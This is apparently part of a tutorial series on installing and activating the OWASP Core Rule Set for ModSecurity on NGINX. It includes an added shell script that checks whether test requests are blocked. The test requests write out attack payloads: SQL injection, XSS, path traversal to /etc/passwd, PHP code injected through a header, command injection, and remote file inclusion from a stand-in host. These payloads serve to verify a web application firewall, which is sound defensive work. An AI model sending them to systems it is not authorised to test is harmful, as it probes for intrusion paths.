Part 2 – Installing the OWASP Core Rule Set (CRS)
After successfully installing ModSecurity v3 in Part 1, this guide will now show you how to install and activate the OWASP Core Rule Set to enable protection rules for ModSecurity.
Download and Activate the OWASP CRS
The following commands will let you download and activate the rule set. Change to the modsec directory, clone the Git repository, and create the crs-setup.conf file:
cd /etc/nginx/modsec
sudo git clone https://github.com/coreruleset/coreruleset.git
cd coreruleset
sudo cp crs-setup.conf.example crs-setup.conf
Next, include the following files in your modsecurity.conf file to activate the OWASP CRS:
Include /etc/nginx/modsec/coreruleset/crs-setup.conf
Include /etc/nginx/modsec/coreruleset/rules/*.conf
After testing the configuration and reloading NGINX, the rule set is active:
sudo nginx -t && sudo systemctl reload nginx
Testing the OWASP CRS
The following tests can be used to verify that the rule set is working. Either enter the URL in your browser or use curl with the -I parameter.
SQL injection via manipulated parameter:
curl -I "https://softworx.at/?id=1'+or+1=1--"
Cross Site Scripting (XSS) – simple JavaScript:
curl -I "https://softworx.at/?search=<script>alert(1)</script>"
Attempt to access a sensitive .env file:
curl -I "https://softworx.at/.env"
Path traversal to access system files:
curl -I "https://softworx.at/index.php?file=../../../../etc/passwd"
Remote Code Execution via header injection:
curl -I -H "User-Agent: <?php system('id'); ?>" "https://softworx.at/"
Command Injection via GET parameter:
curl -I "https://softworx.at/?cmd=ls%20-la"
Remote File Inclusion (RFI):
curl -I "https://softworx.at/?page=http://evil.example.com/shell.txt"
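Running the tests above one by one and reading the headers gets tedious, so here is a small POSIX shell script (an added example, not part of this guide) that sends the guide's GET-parameter checks plus a harmless control request and reports which ones the CRS blocked. It assumes SecRuleEngine is set to On and that blocked requests answer with the CRS default status 403; the TARGET URL is a placeholder to replace with your own host.

```shell
#!/bin/sh
# Added example: verify that the OWASP CRS blocks the test requests from the
# guide. Assumes SecRuleEngine On and the CRS default blocking status 403.
# TARGET is a placeholder; point it at your own NGINX/ModSecurity host.
TARGET="${TARGET:-https://www.example.com}"

# Extract the HTTP status code from a curl -I header dump. When curl follows
# redirects there are several status lines; the last one is the final answer.
status_of() {
  printf '%s\n' "$1" | awk '$1 ~ /^HTTP\// { code = $2 } END { print code }'
}

# Classify a header dump: 403 means the CRS denied the request.
verdict() {
  case "$(status_of "$1")" in
    403) echo BLOCKED ;;
    "")  echo NO_RESPONSE ;;
    *)   echo NOT_BLOCKED ;;
  esac
}

# Send one HEAD request (same as the manual curl -I checks) and print the verdict.
run_test() {
  label=$1
  path=$2
  headers=$(curl -sS -I --max-time 10 "$TARGET$path" 2>/dev/null)
  printf '%-22s %s\n' "$label" "$(verdict "$headers")"
}

# The checks from this guide; a protected site should report BLOCKED for each.
run_all() {
  run_test "SQL injection"  "/?id=1'+or+1=1--"
  run_test "XSS"            "/?search=<script>alert(1)</script>"
  run_test ".env access"    "/.env"
  run_test "Path traversal" "/index.php?file=../../../../etc/passwd"
  run_test "RFI"            "/?page=http://evil.example.com/shell.txt"
  # Control: a plain request must NOT be blocked, otherwise the WAF is
  # misconfigured and will break legitimate traffic too.
  run_test "Benign control" "/"
}

if [ "${1:-}" = "run" ]; then
  run_all
fi
```

Invoke it as `TARGET=https://your-host sh crs-check.sh run`; if every line reads NOT_BLOCKED, check that SecRuleEngine is On rather than DetectionOnly in modsecurity.conf.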
If you’ve activated the OWASP CRS for a WordPress website, you’ll soon run into problems while editing content, because the rule set may block legitimate WordPress functions.
In Part 3, you’ll learn which exceptions need to be added to make WordPress function properly again.